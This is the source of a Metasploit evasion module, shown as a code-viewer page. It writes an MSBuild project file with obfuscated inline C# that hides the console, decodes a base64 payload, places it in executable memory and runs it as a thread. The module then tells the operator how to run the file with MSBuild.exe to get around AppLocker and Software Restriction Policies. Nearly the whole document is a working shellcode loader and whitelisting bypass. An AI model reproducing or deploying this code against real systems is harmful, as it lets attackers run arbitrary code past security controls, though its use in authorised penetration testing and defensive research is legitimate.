Path: blob/master/modules/evasion/windows/applocker_evasion_msbuild.rb
19813 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Evasion67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Applocker Evasion - MSBuild',12'Description' => %q{13This module will assist you in evading Microsoft14Windows Applocker and Software Restriction Policies.15This technique utilises the Microsoft signed binary16MSBuild.exe to execute user supplied code.17},18'Author' => [19'Nick Tyrer <@NickTyrer>', # module development20'Casey Smith' # msbuild bypass research21],22'License' => MSF_LICENSE,23'Platform' => 'win',24'Arch' => [ARCH_X86, ARCH_X64],25'Targets' => [['Microsoft Windows', {}]],26'References' => [['URL', 'https://attack.mitre.org/techniques/T1127/']]27)28)2930register_options(31[32OptString.new('FILENAME', [true, 'Filename for the evasive file (default: msbuild.txt)', 'msbuild.txt'])33]34)35end3637def build_payload38Rex::Text.encode_base64(payload.encoded)39end4041def obfu42Rex::Text.rand_text_alpha 843end4445def msbuild46esc = build_payload47mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]48<<~HEREDOC49<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">50<Target Name="#{mod[0]}">51<#{mod[1]} />52</Target>53<UsingTask54TaskName="#{mod[1]}"55TaskFactory="CodeTaskFactory"56AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >57<Task>58<Code Type="Class" Language="cs">59<![CDATA[60using System;61using System.Runtime.InteropServices;62using Microsoft.Build.Framework;63using Microsoft.Build.Utilities;64public class #{mod[1]} : Task, ITask65{66private static Int32 #{mod[2]}=0x1000;67private static IntPtr #{mod[3]}=(IntPtr)0x40;68private static UInt32 #{mod[4]} = 0xFFFFFFFF;69[System.Runtime.InteropServices.DllImport("kernel32")]70private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);71[System.Runtime.InteropServices.DllImport("kernel32")]72private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);73[System.Runtime.InteropServices.DllImport("kernel32")]74private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);75[System.Runtime.InteropServices.DllImport("user32.dll")]76static extern bool ShowWindow(IntPtr #{mod[5]}, int nCmdShow);77[System.Runtime.InteropServices.DllImport("Kernel32")]78private static extern IntPtr GetConsoleWindow();79const int #{mod[6]} = 0;80public override bool Execute()81{82IntPtr #{mod[5]};83#{mod[5]} = GetConsoleWindow();84ShowWindow(#{mod[5]}, #{mod[6]});85string #{mod[7]} = "#{esc}";86byte[] #{mod[8]} = Convert.FromBase64String(#{mod[7]});87byte[] #{mod[9]} = #{mod[8]};88IntPtr #{mod[10]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[9]}.Length, #{mod[2]}, #{mod[3]});89System.Runtime.InteropServices.Marshal.Copy(#{mod[9]}, 0, #{mod[10]}, #{mod[9]}.Length);90IntPtr #{mod[11]} = IntPtr.Zero;91WaitForSingleObject(CreateThread(#{mod[11]}, UIntPtr.Zero, #{mod[10]}, #{mod[11]}, 0, ref #{mod[11]}), #{mod[4]});92return true;93}94}95]]>96</Code>97</Task>98</UsingTask>99</Project>100HEREDOC101end102103def file_format_filename(name = '')104name.empty? ? @fname : @fname = name105end106107def create_files108f1 = datastore['FILENAME'].empty? ? 'msbuild.txt' : datastore['FILENAME']109f1 << '.txt' unless f1.downcase.end_with?('.txt')110file1 = msbuild111file_format_filename(f1)112file_create(file1)113end114115def instructions116print_status "Copy #{datastore['FILENAME']} to the target"117if payload.arch.first == ARCH_X86118print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"119else120print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"121end122end123124def run125create_files126instructions127end128end129130131